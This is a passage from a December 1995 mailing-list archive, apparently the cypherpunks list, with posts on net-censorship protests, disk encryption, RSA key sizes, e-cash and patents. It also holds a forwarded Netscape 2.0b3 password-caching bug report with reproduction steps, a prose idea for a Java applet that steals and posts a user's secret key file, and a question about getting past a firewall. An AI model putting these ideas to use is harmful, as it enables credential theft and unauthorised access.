but didn't send us email. So all told, our very rough guess is there were well over 50,000 phone calls and faxes made on the one day." "The Net is coming of age, politically," said Jerry Berman, Director of the Center for Democracy and Technology (CDT), another member of the on-line coalition. Safdar, of VTW, concurred, saying, "I think Washington got the message today that there's a new grass-roots interest group around, and we're going to be a big part of the 1996 elections." (VTW's initial election activities can be found at http://www.vtw.org/pledge.) In addition to the Day of Protest, rallies are scheduled on Thursday, December 14th, in San Francisco and Seattle, and a protest will be held that day at 2:00 in New York City. The New York rally will be at the Cyber-Cafe, 273A Lafayette St from 2-3pm on Thursday, Dec 14th. Contact Steven Cherry or Shabbir J. Safdar for details. The Austin rally is planned for Tue. Dec 19th. No more information is available at this time. Information about the San Francisco rally can be obtained from http://www.hotwired.com/staff/digaman/. Information about the Seattle rally can be obtained from http://www.wnia.org/WNIA/hap/rally.html. Voters Telecommunications Watch is a volunteer organization, concentrating on legislation as it relates to telecommunications and civil liberties. VTW publishes a weekly BillWatch that tracks relevant legislation as it progresses through Congress. It publishes periodic Alerts to inform the about immediate action it can take to protect its on-line civil liberties and privacy. More information about VTW can be found on-line at gopher -p 1/vtw gopher.panix.com www: http://www.vtw.org or by writing to vtw at vtw.org. The press can call (718) 596-2851 or contact: Shabbir Safdar Steven Cherry shabbir at vtw.org stc at vtw.org ________________________________________________________________________ WHERE CAN I LEARN MORE? At this moment, there are several organizations with WWW sites that now have, or will have, information about the net censorship legislation and the National Day Of Protest: American Civil Liberties Union (ftp://ftp.aclu.org/aclu/) Center for Democracy and Technology (http://www.cdt.org/) Electronic Frontier Foundation (http://www.eff.org/) Electronic Privacy Information Center (http://www.epic.org/) Wired Magazine (http://www.hotwired.com/special/indecent/) Voters Telecommunications Watch (http://www.vtw.org/ or finger vtw at panix.com) ________________________________________________________________________ End Alert ======================================================================== ----------------------- Headers -------------------------------- _________________________ Joel M Bowers & Assoc [jmba at jmba.com] Multiuser Database Design [MCN,ASPN & Claris Solutions Alliance] _________________________ Voice 603-778-7494 Fax 603-778-7484 _________________________15 Curtis Road, Hampton Falls, NH 03844 --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From dklur at dttus.com Mon Dec 18 13:13:06 1995 From: dklur at dttus.com (David Klur) Date: Tue, 19 Dec 1995 05:13:06 +0800 Subject: redirect of newsgroups Message-ID: <9511188193.AA819305757@cc2.dttus.com> For those of us sitting behind a firewall that blocks out all of the alt, rec, etc.. newsgroups...is there another way to access these groups? For example, redirecting the contents of alt.2600 to, say, comp.2600 (because this firewall allows the comp.xxx groups through). Or any other hacks around this inconvenience? -----BEGIN PBP SIGNATURE----- Version: 1.0.0, Copyright 1995, Pretty Bad Privacy David Klur dklur at dttus.com I am who I am because I say so. So there. -----END PBP SIGNATURE------- From markm at voicenet.com Mon Dec 18 13:43:09 1995 From: markm at voicenet.com (Mark M.) Date: Tue, 19 Dec 1995 05:43:09 +0800 Subject: Securing the end-points In-Reply-To: <608235518.31497752@BayNetworks.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On 18 Dec 1995, Glen McBride wrote: > Greetings! > I was wondering if in addition to all the work and discussion regarding > crypto which generally centres around the transmission path information takes > traveling from end-point to end-point, there is any work being done to secure > the end-points themselves (I.e. files on your PC etc.) > > In my view the end-points present the most vulnerability in the overall > message path from person to person. It is at these points that the > message/information exists as cleartext even if for a short period of time. > While of course it is possible to PGP encode your files is this a practical > way to go about securing your system? I am aware or RSA secure but is that > all there is out there? > > Thanks in advance > > Glen McBride > Bay Networks ASIA-PAC customer service > Australia > The best way to secure the endpoints of communication is to use a sector level encryption TSR like SecureDrive. In a program like this, when a file is opened for reading or writing, the TSR automatically en/decrypts the data before it is processed by the calling application. Aside from a slightly slower disk access rate, a program like this is not inconvenient to use at all. SecureDrive is available at ftp://ftp.csua.berkeley.edu/pub/cypherpunks/ filesystems/secdr13c.zip. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNXTIrZc+sv5siulAQHCEQQAoe+4m0mbN9vjQwsO3cDbC/f/HQv5wlv5 TMRIsyYZ7JdYbFqoBIJyHCvKrVu+D41MsOJBZYpdOvd6pn9sQZA8jf2MaSFFnV7O MgeupyvG3/gvHYFCobFWYfpDzjHHJt57CxxVHb8q3q+pJs2uF0fDTtWUxvBjk4ym cJgsC3sc1jo= =x6Ca -----END PGP SIGNATURE----- finger markm at voicenet.com for Public Key http://www.voicenet.com/~markm/ Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5 -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+ b+++ DI+ D++ G+++ e! h* r! y? ------END GEEK CODE BLOCK------ From wilcoxb at taussky.cs.colorado.edu Mon Dec 18 13:43:58 1995 From: wilcoxb at taussky.cs.colorado.edu (Bryce) Date: Tue, 19 Dec 1995 05:43:58 +0800 Subject: my idea of the ideal encryption tool for the masses In-Reply-To: <199512170710.SAA17896@molly.cs.monash.edu.au> Message-ID: <199512182100.OAA06654@taussky.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Jiri Baum wrote in private e-mail: > > Apart from that, this kind of thing has been proposed before, > and (for payment at least) I've read a paper somewhere that > uses something like this to get off-line anon. e-cash with > multi-party mistrust. (Ie nobody trusts anybody.) Yes, even such klooges such as Mondex might be considered a variation on my idea. Ultimately, though, I expect this device to become my *only* interface with the Net. I don't own any long-term storage device. Instead I just rent it over the Net and encrypt any long-term data that I consider private. I do any *sensitive* processing on the CPU in my handheld computer, but if it's a big job and I don't mind people watching then I rent a CPU over the Net to chew on it. This device is perfectly portable and can be plugged into any Net jack in an office or telephone booth, or perhaps it can do wireless. The important point is that no matter where I am physically, or what long-term storage device I am using via the Net, I have complete crypto security. (Mod Tempest- surveillance, physical subversion of my crypto box, etc.) If it were done right I could use this same box for my notepad, wallet, e-mail agent, Web browser, game-player, etc. etc. etc. > (But that requires the bank to trust tamper-proof h/w; if you > give up anon, as you have, you don't need that because it only > need resist until Joe can revoke his key - easily enough done > because the shop needs to have a list of valid ones anyway. > Alternatively you can keep anon but make clearing on-line, > which results in what is usually called a digital wallet.) Hm. As often happens in these kinds of discussions, we've missed each other because of different semantic conventions or something. My idea does not depend upon tamper-proof hardware in the sense that the owner must be prevented from cracking it open, but it *does* (as does every conceivable crypto system) depend on tamper-prevention in the sense that those antagonistic to the owner must be prevented from cracking open his box! Also I haven't given up anonymity at all. Oh! You mean in my example of Joe paying at the grocery store. Well he can have a pseudonymous account at that store if he wants. There is certainly no *necessity* to give up self-identity-control in any way. > > It only does this in response to some kind of > > authentication-action from Joe himself. Perhaps he > > inputs a 4-digit PIN. (It should be designed so that > ... > > Fingerprint scan? I thought about that but I personally wouldn't trust it. It might fail to recognize my fingerprint at an important moment. Besides, I hate the thought of a mugger taking my index finger also when he takes my wallet... Regards, Bryce signatures follow "To strive, to seek, to find and not to yield." -Tennyson bryce at colorado.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01 iQCVAwUBMNXSW/WZSllhfG25AQEF4AP9GKHbSh5RgROKFclm/fgkpI+FcZjagTo9 SBa7Kdn9sFczdk23u6mHbKufDKFJO5oyri5MOPvU2QZwa9iP3zGjaBKcS6QbSOJ2 c4W71cFVJ+YZw8nnsMGwNmdISl2T0VYjQo/za4D2blZMRGDLdHgcl/E3FfTXxn5K vBEUglr59Gs= =ksB+ -----END PGP SIGNATURE----- From wwwziff at internet.com Tue Dec 19 06:04:36 1995 From: wwwziff at internet.com (ZD Net / World Wide Web Edition) Date: Tue, 19 Dec 95 06:04:36 PST Subject: ZD Net Update v.1 #4 Message-ID: <199512191404.JAA25130@yipee.internet.com> ______________________ZD Net Update_______________________ v. 1 #4 12-11-95 Welcome to ZD Net Update, the free E-mail newsletter created especially for registered users of Ziff-Davis Interactive's ZD Net/World Wide Web Edition. ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting developments on ZD Net. In this issue: > YAHOO, ZIFF-DAVIS ANNOUNCE PLAN TO JOIN FORCES > PC MAGAZINE UNWRAPS ITS 1995 HOLIDAY GIFT GUIDE > COMPUTING TRAILBLAZER HELPS YOU "BUY IT ONLINE" * * * * * * * * * * YAHOO, ZIFF-DAVIS ANNOUNCE PLAN TO JOIN FORCES On Tuesday, December 12, Yahoo Corp. and Ziff-Davis Publishing Co. announced a strategic relationship that establishes a new, Web- driven publishing model for delivering content via print, online, and CD ROM. The relationship leverages the expertise and brand names of Yahoo, operator of the leading directory on the Web, and Ziff- Davis, the leading publisher of computer magazines and computing content online, including ZD Net. The new alliance is initially focused on two media products: Yahoo Internet Life and ZD/Yahoo Computing. Yahoo Internet Life is an interactive magazine based on one of the most popular sites on the World Wide Web. ZD/Yahoo Computing seeks to become the ultimate value-added, online directory of computing resources on the Web. Yahoo Internet Life combines a Web site, a print publication, and a CD ROM. Each issue of the quarterly magazine will include a CD ROM that contains virtually everything in the magazine as well as the software that users need to connect to the Web. The print version of Yahoo Internet Life will debut on newsstands in February 1996. Bill Machrone, Editor-in-Chief of ZD Internet Life and Ziff-Davis's Vice President of Technology, was named Editor-in-Chief of Yahoo Internet Life. ZD/Yahoo Computing will be the definitive online guide to finding and using computing resources on the Web. It will incorporate an enhanced version of The Computing Trailblazer, a popular feature of the ZD Net Web site that reviews computing sites on the Internet, as well as new features to help people find computing products, companies, and services. ZD/Yahoo Computing will be available in early 1996. For more information about the announcement, including a Shockwave file and VDOLive video clips, check out the ZD Public Relations site at: http://www.zdnet.com/pr/ * * * * * * * * * * PC MAGAZINE UNWRAPS ITS 1995 HOLIDAY GIFT GUIDE The holidays are fast approaching, you're faced with tons of folks who need gifts, and you have no idea what to buy them. How to get in the holiday spirit? Don't despair. Your shopping list may be long, but PC Magazine's list of gift ideas is bound to be longer. The editors at PC Magazine have gathered 101 of the best educational and entertainment products to hit the shelves since last holiday season. Nearly all of these products are Windows-based, except for the games, most of which run under DOS. For the youngest folks on your list, the Kids' Software section includes a selection of learning games covering all the basic subject areas, many of which star characters the kids will recognize. For those hard-to-please gamers, this holiday offers an abundance of riches in all categories: action and adventure games, arcade games and puzzles, strategy and simulation games, and sports games. Looking for something a bit less frivolous? Then check out the reference offerings and the selection of personal productivity software. For gadget lovers, there's a fun and funky array of PC peripherals that would look great on any desktop. And don't miss the list of 10 great gifts under $35. So forget about fretting over that holiday shopping list. PC Magazine gives you 101 reasons to celebrate this holiday season. Discover a little holiday cheer at: http://www.zdnet.com/~pcmag/issues/1422/pcm00154.htm * * * * * * * * * * COMPUTING TRAILBLAZER HELPS YOU "BUY IT ONLINE" Looking for an easier way to get your hands on the latest hardware and software? Why not go online? Introducing "Buy It Online," the newest category in The Computing Trailblazer, Ziff-Davis's guide to computing resources on the Web. Each of the nearly two dozen sites that are reviewed in Buy It Online offers a strong selection of computer products for sale, and many also enable online purchasing (which is likely to become a firm requirement for this category in the near future). Some of the sites provide links to manufacturers' sites and other Internet resources of value to their customers. Others are just plain fun to visit for their contests, downloads, and freebies. A few are works in progress that show great potential. What are the common characteristics that mark the better sites? For starters, secure credit-card transactions, up-to-date price lists, and catalog items that link to product information combining overview articles, feature lists, and tech specs. If you order computer products on the Web, please click the Feedback button tell the Trailblazer editors what your experience was like. Good or bad, Trailblazer wants to know about it. For the latest word on the best computing sites, including more than 300 (and growing) site-reviews under familiar computer headings, check out Trailblazer today at http://www.zdnet.com/~zdi/tblazer/ * * * * * * * * * * ZD Net Update is the official newsletter of ZD Net/World Wide Web Edition. It is compiled by Tom Schmidt (tom_schmidt at zd.com). Feel free to respond with news, notes, comments, or suggestions. To unsubscribe to ZD Net Update, point your browser to: http://www.zdnet.com/cgi-bin/ziffmail.pl/update and select "Unsubscribe to ZD Net Update." From warlord at MIT.EDU Mon Dec 18 14:14:48 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Tue, 19 Dec 1995 06:14:48 +0800 Subject: What ever happened to... Cray Comp/NSA co-development In-Reply-To: <199512180550.VAA13167@mycroft.rand.org> Message-ID: <199512181815.NAA15202@toxicwaste.media.mit.edu> Correction of another detail: > > tcmay at got.net (Timothy C. May) writes: > > When you've done this, and concluded that RSA-129 could be done in, say, X > > minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT > > group), and on to the 1024- and 2048-bit keys. Tell us how many years or > > centuries it will take. (Hint: Rivest and Schneier have done these RSA-129 is 129 decimal digits, not 129 bits. This computes to about 425 bits, which is actually more difficult than the 384-bit Blacknet key. -derek From mittonk at ucsu.colorado.edu Mon Dec 18 14:23:36 1995 From: mittonk at ucsu.colorado.edu (Mitton Ken) Date: Tue, 19 Dec 1995 06:23:36 +0800 Subject: redirect of newsgroups Message-ID: <199512182116.OAA21364@ucsu.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Might be able to if you had admin-level access to the newsserver, but if there's a firewall between you and the nearest uncensored newsserver, I doubt that's the case... had the same problem on my school machine. Ended up just getting an account on another machine. --Ken Mitton mittonk at colorado.edu http://ucsu.colorado.edu/~mittonk/ PGP KeyID: BAB3CF0D -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMNXZ7Wzuqz+6s88NAQHrwQIA0bHF+6yxLHPcFIdODJhTH7Mq4+vKxho+ Jq4xOBn+yB8KY0mhPFUKQx43xmULt44AB2Jeo1cEt9FTRAFSIvua3A== =mTvu -----END PGP SIGNATURE----- From trei at process.com Tue Dec 19 06:32:17 1995 From: trei at process.com (Peter Trei) Date: Tue, 19 Dec 95 06:32:17 PST Subject: (Fwd) SECURITY ALERT: Password protection bug in Netsca Message-ID: <9512191432.AA28817@toad.com> Jeff writes: > This report is mostly bogus. Netscape does not, and never > has stored http auth passwords in files on your disk. However > we do cache documents from servers that use http auth. > In this case the user had their preferences set to check the > host site for updated content "once per session". There is > a bug, which we are fixing before 2.0 ships, that if the > auth fails the document should be removed from the cache but > was not. If the user had set their cache checking to "never", > then if the document is in the cache, it will always be shown to > the user, since no connection is made to the server. > Content providers who don't want their web pages cached > should use the 'Pragma: no-cache' http header. This will > tell the navigator to not save the document in the disk cache. > > --Jeff Thanks for clearing that up - I see you've already been over to www-security. The fast response Netscape (and in particular, you yourself) make to reported problems is something I'm very pleased to see. Peter Trei trei at process.com From EALLENSMITH at ocelot.Rutgers.EDU Mon Dec 18 14:44:51 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 19 Dec 1995 06:44:51 +0800 Subject: What ever happened to... Cray Comp/NSA co-development Message-ID: <01HYYJ27WNYQ8Y51HJ@mbcl.rutgers.edu> From: tcmay at got.net (Timothy C. May) >First, half a million chips is not that big a deal...the Connection Machine had up to 64,000. Very few cryptographic problems of interest to us will be affected by a mere factor of a million or so. -------------------- While the cryptographic stuff isn't much of a problem, how about text analysis of multiple sources, possibly via a neural net simulation (which IIRC a massively parallel machine is nice for)? -Allen From iagoldbe at calum.csclub.uwaterloo.ca Mon Dec 18 14:51:41 1995 From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg) Date: Tue, 19 Dec 1995 06:51:41 +0800 Subject: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT" In-Reply-To: <199512151800.KAA11304@jobe.shell.portal.com> Message-ID: <4b4nnc$b57@calum.csclub.uwaterloo.ca> In article <199512151800.KAA11304 at jobe.shell.portal.com>, wrote: >On Mon, 11 Dec 1995, Michael Coates wrote: > >> PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT" >> Netscape Communications has awarded two software sleuths $1,000 each for >> finding security gaps in its Netscape Navigator 2.0 software. The company >> also awarded gifts to 50 other contestants in its "Bugs Bounty" program for >> identifying non-security problems. (Wall Street Journal 11 Dec 95 B7) > >Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000 >from Netscape for finding the HUGE security flaws in Netscape's existing >product line?? > >I can't remember whether they got anything or not ... That would be no (well, except for the nifty T-shirt from Sameer; Thanks!). - Ian "There's a reason people talk about `starving grad students'..." From andr0id at midwest.net Mon Dec 18 14:56:47 1995 From: andr0id at midwest.net (andr0id at midwest.net) Date: Tue, 19 Dec 1995 06:56:47 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512181805.MAA11175@cdale1.midwest.net> >I'm not familiar with this aspect - how do cellular services store and >make use of billing information, as opposed to traditional phone services? > Most cellular systems still write billing tapes and send them to a clearing house for proccessing. It may take 2 or 3 days before a bill is updated. Thats not including that it takes sometimes up to a month before your roaming charges are recorded from all of the other cellular carriers. Some carriers have realtime billing but it still doesn't take into account roaming. >> If >> cellular customers start getting sales calls from a company that received a >> list from a cellular carrier, the cellular carrier is obligated to refund >> the customers bill for those calls if the customer complains becuase the >> customer pays for calls comming or going. > >Is this obligation incurred by the contract between the customer and the >cellular service, by statute, or otherwise? Contracts can always be >broken, and passing laws to guard the guardians generally amounts to >having the fox guard the henhouse... > This obligation is uncurred mostly by the fact that cellular carriers HATE to loose customers. If refunding a few min. of air-time helps keep a customer then they will. Unlike the phone company, a threat to discontinue service with a cellular carrier works well in getting your way. Dr0id From bdavis at thepoint.net Mon Dec 18 15:21:58 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 19 Dec 1995 07:21:58 +0800 Subject: Campaign Finance Reform In-Reply-To: Message-ID: On Mon, 18 Dec 1995, jim bell wrote: > At 10:41 AM 12/18/95 -0500, you wrote: > >On Mon, 18 Dec 1995, Jon Lasser wrote: > > > >> On Sun, 17 Dec 1995, jim bell wrote: > >... > >> > It is absolutely true that you couldn't stop a person from communicating > >> > claims of a donation to a politician. But what you COULD do is to ensure > >> > that the donor couldn't PROVE that he made such a donation. In other > words, > >> > _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good > >> > senator would have no idea that I wasn't telling the truth. The people who > >> > REALLY made such donations would be helpless. > >> > >> A tricky way around this, if it's done ALMOST properly, is to donate in > >> odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to > >> your campaign..." > >> > >> All this means is that the donations would have to be lumped in some way > >> so that Senator Sludgepump can't find out the exact amounts donated by > >> any individual. > > > >Cancelled checks. > > > >Or, hand check in addressed, stamped envelope to Senator Sludgepump and > >ask him if he would mind sealing it and dropping it in a mailbox. > > > All of which raises numerous opportunities for sting operations against > politicians, done by individuals by procedures provided for under law. > Escrow (Okay, I know that's a dirty word around here, but...) an encrypted > statement of how you intend to run the sting, to be opened by the escrow > agent at some point in the future, explaining who you're going after and > how. Make the contribution, keep evidence, and if you're successfull the > congressman goes to jail for a few years. The problem with the private investigation is that law enforcement may not believe you were an "innocent" citizen conducting an investigation. Remember the ABSCAM Congressman who contended he was conducting his own investigation ... Escrowing what you intend to do could be seen as blackmail ammunition if the Congressman fails to produce. Unfortunately for the Cryptoanarchists (tm -- in more ways than one), absent law enforcement running the "sting" you are taking a risk of being stung yourself. EBD From anon-remailer at utopia.hacktic.nl Mon Dec 18 15:37:15 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Tue, 19 Dec 1995 07:37:15 +0800 Subject: What ever happened to... Cray Comp/NSA co-development Message-ID: <199512182241.RAA01276@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- At 09:15 PM 12/17/95 -0500, Thaddeus J. Beier wrote: > ---------- > ... about the fate and capabilities of the CCC PIM > (processor-in-memory) machine. A friend of mine was > working on it, and it would have been a screaming machine, > no doubt about it. He said that the Cray mostly acted like > a really fast network for the processor chips. I had thought that it may have been similar to an Active Memory design, but had no real clues to go by. Wasn't sure about the chip array path width either, but thought that 1 bit was probably the way to go given the array size. > ... the PIM chips were made by a dedicated NSA company, > Supercomputer Research Center, in Bowie MD. Hmm... is that the name? > But, it was nowhere near finished when the company finally went > down, and the team was completely disbanded. My friend was talking > about going to the auction when the parts of the various machines > were going to be sold, I don't know if he did so. He suspected that > the various pieces would end up going back east to the Fort > Meade area. Still, it is such an odd machine that you would > probably have to transfer the staff to finish it, and that didn't > happen. Sorry Thad... but NOTHING 'just disappears' at the NSA... > In any case, while it was fast (1/2 million 1-bit processors, > perhaps as low as 1 nanosecond (1 GHz) cycle time), it was not fast > enough to brute force reasonably strong ciphers. It's really no joke > that it would take a computer with picosecond clocks the size of the > earth more than the age of the universe to brute force IDEA, for > instance. Hahahahahahahah!!!!!!!!!! A cryptographer's most POWERFUL weapon, is A False Sense of Security... If you've read Kocher's abstract, you would NO DOUBT realize that there are ALWAYS options to be explored and exploited. I'm sorry, don't take it personal, but I think that this 'til the end o' time' argument leaks like a "sieve"... it's the classic linear thinking thing. > It would have made a great DES cracker, though; my > back-of-the-envelope calculation has it cracking one key every > .75 days on the average. This sounds pretty pessimistic too... > thad > -- Thaddeus Beier email: thad at hammerhead.com > Technology Development vox: 408) 286-3376 > Hammerhead Productions fax: 408) 292-2244 > > ---------- Well... maybe the timing wasn't right for the system's completion. After all, designing a computer with <1 nanosecond cycle time is not child's play. And in quantity it is even more difficult. A few more years of development with Transphaser logic and Holographic storage could work some wonders in computational capailities. Anitro - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMNXt+SoZzwIn1bdtAQEQAQF/YKCYcSiH4BRswP7+4Sv1VIYynpH738vF LFa/31pQBJiEkmkpiykmOcL3YySghGsf =3nUQ -----END PGP SIGNATURE----- From jamesd at echeque.com Tue Dec 19 07:58:08 1995 From: jamesd at echeque.com (James A. Donald) Date: Tue, 19 Dec 95 07:58:08 PST Subject: (fwd) Economics of Digital Money. Message-ID: <199512191557.HAA20962@blob.best.net> > But electronic checking it is a substitute for > conventional checking, it would just increase the > speed of the transaction. From the economic standpoint, > there is no difference in the dynamics of the checking > process from normal checks And email is no different from mail, right? Wrong: When computer programs start spending money and receiving money on behalf of their masters, we will see vast economic changes. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From frissell at panix.com Tue Dec 19 08:36:15 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 19 Dec 95 08:36:15 PST Subject: Antiterrorism Bill Dead Message-ID: <2.2b10.32.19951219163342.006753a4@panix.com> At last some good news from the Hill. The House Judiciary Committee has announced that they are unable to vote on Chukie Schumer's Antiterrorism bill at this time. It is "dead for now." That means that the $500 million for the telecoms companies to carry out the Digital telphony Initiative is also dead for now. Thanks to an heroic coalition of leftist civil liberties types and right wing nuts (including the Fundies) for squashing it for now. Now if we could only convince the Fundies that the Klinton Admin was going to use the Exxon amendment to outlaw religious speech on the nets on the grounds of political indecency. But maybe the Telecoms bill will die too. It did last time. DCF From GLEN_MCBRIDE at BayNetworks.com Mon Dec 18 16:45:26 1995 From: GLEN_MCBRIDE at BayNetworks.com (Glen McBride) Date: Tue, 19 Dec 1995 08:45:26 +0800 Subject: Securing the end-points Message-ID: <608235518.31497752@BayNetworks.com> -----BEGIN PGP SIGNED MESSAGE----- Greetings! I was wondering if in addition to all the work and discussion regarding crypto which generally centres around the transmission path information takes traveling from end-point to end-point, there is any work being done to secure the end-points themselves (I.e. files on your PC etc.) In my view the end-points present the most vulnerability in the overall message path from person to person. It is at these points that the message/information exists as cleartext even if for a short period of time. While of course it is possible to PGP encode your files is this a practical way to go about securing your system? I am aware or RSA secure but is that all there is out there? Thanks in advance Glen McBride Bay Networks ASIA-PAC customer service Australia Views are my own and do not represent those of my employer ===== CURRENT PGP KEY FOLLOWS ===== - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQERAzDFDk4AAAEIAJvkPKWMS8TR5eNNQZw5FjUg8roSe/wFdw3d8vCEfb2lX3G+ qBAQKuTSUAhO8marZvNWF9VPuyqkOGEOrwzdont8jSHAdF9dguh1sP56eGXzyn8n mDN1Fw8vQiNrttvCEYUjvLEML8tFlLc7QlQRkAMEGrkH29D4ck3wOkJLEaSZrTcO RIZAzOBVVvrJORVKsREnGG4IrItJCiREw7Gp/LXIHMSEBCdu2+uaNc9nHQxKcYZc yx9UiiZ0XP6TzzUtkD00ZDtO8OdZCAhXdj0zbCUKVrzuY37EgnFVFQ7SlZZAQn/U Jx26k0eZvZhXjhSVd3QyElbJYNFVLrdyU+h+Gt0AIwQAAAABtCpHbGVuIE1jQnJp ZGU8R0xFTl9NQ0JSSURFQGJheW5ldHdvcmtzLmNvbT4= =N/lg - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMNS1vy63clPofhrdAQHn1wgAjHV2vKXIEY4qZ/Rm2rq4hnJsUJDt+zd5 BbYo/BZBruwX+gqylYlbOemkPvZ7ktAMdu9jUFfaJQ7Cb3jT4kgfp2dqqle6yaq1 0nxU9m7BMiVnSqevtK5Fy+thR/yVZWdHi1LFMy48yp8FCaqvMkEruscOsG0ydUNM lyf3OCNGdN7LQcxQkRE9UzKPwEpacDD/afU5W5aZhhchkpAH9t/kqKzvgXxia1VF 4hfOEcCMN21JO6QGqdnHASVNoIdV44O6BlUPhv5omAqofgU58tnbJ9G3/24zjecM QhxTMGBv+aDB1DtQ+k9wDJTdPBLwhqyWUZWImN3RPVnQb1Ec1CVM8A== =yLIB -----END PGP SIGNATURE----- From jwarren at well.com Tue Dec 19 09:17:11 1995 From: jwarren at well.com (Jim Warren) Date: Tue, 19 Dec 95 09:17:11 PST Subject: Oklahoma University: Is this legal?... Message-ID: At 07:09 PM 12/17/95, sethf at MIT.EDU wrote: > c) someone decided that everything stored on the University's >computer system was therefore a "public record" (since the computer is >"owned" by the public), and thus had to be accessible by law. Uh, every PRA (public records act) in the nation hase extensive exceptions -- for school records, collective bargaining, various investigative records, etc. NO state PRA or federal FOIA declares blanket access to all public-agency records -- often justifiably; sometimes for agency arse-covering. --jim Jim Warren, GovAccess list-owner/editor (jwarren at well.com) Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc. From trei at process.com Mon Dec 18 17:32:23 1995 From: trei at process.com (Peter Trei) Date: Tue, 19 Dec 1995 09:32:23 +0800 Subject: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b Message-ID: <9512190026.AA15461@toad.com> Haven't had time to test this myself. Peter Trei ------- Forwarded Message Follows ------- Date: Mon, 18 Dec 95 17:18:28 From: Subject: SECURITY ALERT: Password protection bug in Netscape 2.0b3 To: www-security at ns2.rutgers.edu, jcarroll at redman.canada.dg.com Cc: tara at linkage.cpmc.columbia.edu A potentially serious bug has just come to my attention concerning the handling of password-protected pages accessed via Netscape 2.0b3. Apparently when you type in the password to access a protected document Netscape stores the password in a local hidden file (in one of the .db files created in the .netscape directory on UNIX systems, and in the Netscape Preferences file on Macintoshes). This password is then used for accessing the document during subsequent accesses. The problem is that Netscape does not delete the stored password when the program quits. The problem has been reproduced on Unix and Macintosh platforms. I haven't tried the Windows implementation yet, but I suspect the same problem exists. This leads to the following behavior: 1) Open up Netscape and access a password-protected document. 2) Quit Netscape 3) Start Netscape again and try to retrieve the document. When the password-entry dialog comes up, click "Cancel". 4) Try to access the document a second time. Now Netscape lets you in without asking for the password! On Unix systems, this means that if you go over to a associate's machine to show him a protected document, Netscape will record your typed in password for posterity. Your associate now has full access to this page. The situation is particularly dangerous on PCs in a shared "computer lab" environment. Everybody who uses Netscape unwittingly makes his passwords available to all other users. Please let me know if anyone finds out more about this problem. I'm going to add it to the WWW security FAQ. Lincoln ======================================================================== Lincoln Stein, M.D.,Ph.D. lstein at genome.wi.mit.edu Director: Informatics Core MIT Genome Center (617) 252-1916 Whitehead Institute for Biomedical Research (617) 252-1902 FAX One Kendall Square Cambridge, MA 02139 =================http://www-genome.wi.mit.edu/~lstein==================== From andrew_loewenstern at il.us.swissbank.com Tue Dec 19 09:38:34 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 19 Dec 95 09:38:34 PST Subject: Java and timing info - second attempt Message-ID: <9512191737.AA00980@ch1d157nwk> Jim Miller (jim_miller at bilbo.suite.com) writes: > Would it be possible to create a Java applet that causes the client > machine to sign or encrypt something with their private key, and > then send back timing info? Since access to a private key should always be strictly mediated by the user any Java implementation would probably pop up a panel asking permission for every single private-key encryption operation requested by the applet. The timing attacks require many timed encryptions to get enough information about the key. Even if the user was completely clueless and had no idea what the applet was trying to do I would imagine that they would get tired of clicking "OK" long before sufficient key information was leaked ..... Of course it would be a lot easier for the applet to just try to read the secret key file, encrypt it with an embedded public key, and post it to alt.anonymous.messages. Depending on how security was setup there might be only one or two panels that the user has to dismiss. It would probably get past the same number of clueless users that a more complicated timing attack would fool. andrew From rschlafly at attmail.com Mon Dec 18 18:27:18 1995 From: rschlafly at attmail.com (Roger Schlafly) Date: Tue, 19 Dec 1995 10:27:18 +0800 Subject: RSA Data v. Cylink hearing Message-ID: Another hearing in the public-key patent saga. Cylink/CKC is going for a preliminary injunction against RSA Data for contributory infringement of the Stanford patents. RSA Data has a license to the Stanford patents, but has no sublicensing authority. It has been selling RSA & Diffie-Hellman toolkits and telling customers that they don't need PKP or Stanford patent licenses, and even indemnifying those customers against a patent infringement claim. An arbiter has already ruled that RSA Data's license does not cover customers shipping products. Of course I take the position that these patents are invalid, and now that Bidzos has lost control of them, he 